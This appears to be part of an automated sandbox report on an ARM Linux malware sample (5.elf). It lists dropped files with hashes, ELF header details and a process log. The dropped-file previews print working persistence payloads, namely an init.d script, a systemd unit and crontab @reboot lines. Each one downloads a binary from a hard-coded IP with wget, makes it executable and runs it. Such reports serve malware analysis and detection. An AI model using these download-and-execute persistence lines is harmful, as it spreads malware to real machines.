                SHA-512:12A6C4026C4F0AFFD5653BAB2C2CE542F40CBD5588D4B41806C010E080FD2E14083D63263E2E6959BC96948C787D800E16DE7107298E929BF6233A69917FACE8
                Malicious:true
                Joe Sandbox View:
                • Filename: 5.elf, Detection: malicious, Browse
                • Filename: 5.elf, Detection: malicious, Browse
                Reputation:low
                Preview:#!/bin/bash.### BEGIN INIT INFO.# Provides: hello.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: hi :).# Description: hello :).### END INIT INFO..case "$1" in. start).rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 |C 2 R -1157128192..p4 > /dev/null 2>&1;" ;;. stop). exit 0. ;;. restart). $0 stop. $0 start. ;;. *). echo "Usage: $0 {start|stop|restart}". exit 1. ;;.esac..exit 0.
                Process:/tmp/5.elf
                File Type:troff or preprocessor input, ASCII text
                Category:dropped
                Size (bytes):308
                Entropy (8bit):5.278306884358087
                Encrypted:false
                SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOAkjF5CowzzQe1IEXwsCBLQmWA4Rv:zb9RZADJiIE+m7qowXQeCLLHWrv
                MD5:A76DB7EEB3C78A63FE61B25A0214EA41
                SHA1:8F911953BAA1C03AAC7607AC3E5E5528B0249791
                SHA-256:2148F0C20C47C19BCBA50FD9CB4F843FF162DF34857FB8EC537F3063BB95D756
                SHA-512:5D1E0E85FC3F6EB6C90D0FD608058B66A71CCB484B20E5E340C330A7B6F4B69E12460032555B06B643FA56700571D9821DF0F5A8C9F4F17726598C3795A7AAA8
                Malicious:false
                Reputation:low
                Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 |C 2 R -1157128192..p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                File Type:ASCII text
                Category:dropped
                Size (bytes):76
                Entropy (8bit):3.7627880354948586
                Encrypted:false
                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                Process:/tmp/5.elf
                File Type:troff or preprocessor input, ASCII text
                Category:dropped
                Size (bytes):129
                Entropy (8bit):4.778395374428636
                Encrypted:false
                SSDEEP:3:SH3YFKKLojeMPHRCQyqwu0UzSGuVqBgQZm31IUU0XzT9Fw2sePn:SH3okjF5CowzzQe1IEX9W5Cn
                MD5:45B23162C5113B292A518DACF81A56E1
                SHA1:4E11A8C3105B4B3ED71D308E780D956BD0136F48
                SHA-256:FAA9C2DBBE3B6EADB68C5E226783C063A67384B6513C0DC97BBEF210ED923EF2
                SHA-512:04071D542AA91A7ED22F16AA54BD04CBF5D2A5211708F0B00043EE7697E7C9E1C148E42CCA25ED64098920443AEC254A41E42AC9D22A9775C483CD419C658B60
                Malicious:true
                Reputation:low
                Preview:@rebootrm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 |C 2 R -1157128192..p2 > /dev/null 2>&1;".
                Process:/tmp/5.elf
                File Type:zlib compressed data
                Category:dropped
                Size (bytes):257
                Entropy (8bit):3.3648001936565826
                Encrypted:false
                SSDEEP:6:GYgDFFJXM/VUT4DFF//I0Y/VjmsVot/VOArB/VF:+lXNcUk/
                MD5:6B9F7996339AB20026194A6AE71D8725
                SHA1:74C098B02EACDCF87B217062EFEFF4D28B8F7048
                SHA-256:B204237BE41D923C467B3472ADE8D022677BE43B76DD2822CD7C4473F90B5995
                SHA-512:22BDF19C13A1627453B3E66D2EA8EDFB4F57BC3916C899240ED439C40CEFD36DCB2F0FEF8689B33216BA1AEAC5D29F2F94E922B57A8776F626763D4E794E538A
                Malicious:false
                Reputation:low
                Preview:8000-1e000 r-xp 00000000 fd:00 531606 /tmp/5.elf.26000-27000 rw-p 00016000 fd:00 531606 /tmp/5.elf.27000-2d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]..
                Process:/usr/bin/crontab
                File Type:troff or preprocessor input, ASCII text
                Category:dropped
                Size (bytes):319
                Entropy (8bit):5.240253255847118
                Encrypted:false
                SSDEEP:6:SUrpqoqQjEOP1K8XAEuLuwJOBFQ3pVdzV4iGMQ5UYLtCFt3HYokjF5CowzzQe1IK:8Qj7QEuLut83pbV4UeHLUHYzqowXQeCK
                MD5:8FA46262C5F0434E4396669D91B346EB
                SHA1:D4A4743BAC4FA407764299723FD0A9BFA34FC0F2
                SHA-256:5115917A603A0D51286D78E906D0FF8C55DA38A8C9B58DEB2F3AD27E3552A0E2
                SHA-512:9889BE6748F8804C1D62E0DEC074F57B8B177E729207495A1F17B59DA2D68BDC7502ED6647D9B672973FAD2CF54EDE078B2CD4AC053B6539068DFE74DD6893F5
                Malicious:true
                Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (/tmp/crontab.tmp installed on Sun Jan 12 08:40:37 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@rebootrm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 |C 2 R -1157128192..p2 > /dev/null 2>&1;".
                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                Entropy (8bit):6.0999097786129015
                TrID:
                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                File name:5.elf
                File size:92'052 bytes
                MD5:acf8c6201a22aa0c7c0751252ab9ae39
                SHA1:6de61f4a111b08628b671480a7dc59cfbeeaed4b
                SHA256:2310571a157978b46838410517b66b6a45f8ab5c2846fc15ac9c93168ca80dd9
                SHA512:e540bd63e1fb7ed70db4d4554cb2d1f171b3669f4d35e409b267eceb206a9eff7d522bc24187b5297c3c1d4c3a14e4e3a68bc2d841a017ee0eda8df3353760fb
                SSDEEP:1536:bGnn24oWLbTfrAz4sGpimrEW0sPcvWye+TM6ipjA4rNGNkxnlgIZgTeg:L1YM+MQD0OE4rNGNACJT
                TLSH:75930B86F9816A51C6C146B7BD2F019E33066BA8E2DE7313DD241B64778B51F0F27A0B
                File Content Preview:.ELF..............(.....T...4....e......4. ...(......................\...\...............`...`...`..................Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../..e.......`....-.@0....S

                ELF header

                Class:ELF32
                Data:2's complement, little endian
                Version:1 (current)
                Machine:ARM
                Version Number:0x1
                Type:EXEC (Executable file)
                OS/ABI:UNIX - System V
                ABI Version:0
                Entry Point Address:0x8154
                Flags:0x4000002
                ELF Header Size:52
                Program Header Offset:52
                Program Header Size:32
                Number of Program Headers:3
                Section Header Offset:91532
                Section Header Size:40
                Number of Section Headers:13
                Header String Table Index:12
                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                NULL0x00x00x00x00x0000
                .initPROGBITS0x80940x940x100x00x6AX004
                .textPROGBITS0x80b00xb00x142c40x00x6AX0016
                .finiPROGBITS0x1c3740x143740x100x00x6AX004
                .rodataPROGBITS0x1c3840x143840x19380x00x2A004
                .eh_framePROGBITS0x260000x160000x40x00x3WA004
                .init_arrayINIT_ARRAY0x260040x160040x40x00x3WA004
                .fini_arrayFINI_ARRAY0x260080x160080x40x00x3WA004
                .gotPROGBITS0x260100x160100x740x40x3WA004
                .dataPROGBITS0x260840x160840x4900x00x3WA004
                .bssNOBITS0x265140x165140x29e00x00x3WA004
                .ARM.attributesARM_ATTRIBUTES0x00x165140x100x00x0001
                .shstrtabSTRTAB0x00x165240x670x00x0001
                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                LOAD0x00x80000x80000x15cbc0x15cbc6.12680x5R E0x8000.init .text .fini .rodata
                LOAD0x160000x260000x260000x5140x2ef46.02860x6RW 0x8000.eh_frame .init_array .fini_array .got .data .bss
                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                System Behavior

                Start time (UTC):14:40:30
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:/tmp/5.elf
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/bin/sh
                Arguments:sh -c "systemctl daemon-reload > /dev/null 2>&1"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/usr/bin/systemctl
                Arguments:systemctl daemon-reload
                File size:996584 bytes
                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/bin/sh
                Arguments:sh -c "systemctl start hello.service > /dev/null 2>&1"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/usr/bin/systemctl
                Arguments:systemctl start hello.service
                File size:996584 bytes
                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/bin/sh
                Arguments:sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/usr/bin/crontab
                Arguments:crontab /tmp/crontab.tmp
                File size:43720 bytes
                MD5 hash:66e521d421ac9b407699061bf21806f5

                Start time (UTC):14:40:38
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:40:38
                Start date (UTC):12/01/2025
                Path:/bin/sh
                Arguments:sh -c "/etc/init.d/hello > /dev/null 2>&1"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):14:40:38
                Start date (UTC):12/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):14:40:38
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:40:38
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:40:38
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:40:38
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:40:38
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:40:38
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:41:11
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:41:11
                Start date (UTC):12/01/2025
                Path:/tmp/5.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):14:40:32
                Start date (UTC):12/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):14:40:32
                Start date (UTC):12/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):14:40:33
                Start date (UTC):12/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):14:40:33
                Start date (UTC):12/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):14:40:33
                Start date (UTC):12/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):14:40:33
                Start date (UTC):12/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):14:40:33
                Start date (UTC):12/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):14:40:33
                Start date (UTC):12/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):14:40:33
                Start date (UTC):12/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):14:40:33
                Start date (UTC):12/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):14:40:33
                Start date (UTC):12/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):14:40:33
                Start date (UTC):12/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/usr/lib/systemd/systemd
                Arguments:-
                File size:1620224 bytes
                MD5 hash:9b2bec7092a40488108543f9334aab75

                Start time (UTC):14:40:37
                Start date (UTC):12/01/2025
                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                File size:22760 bytes
                MD5 hash:3633b075f40283ec938a2a6a89671b0e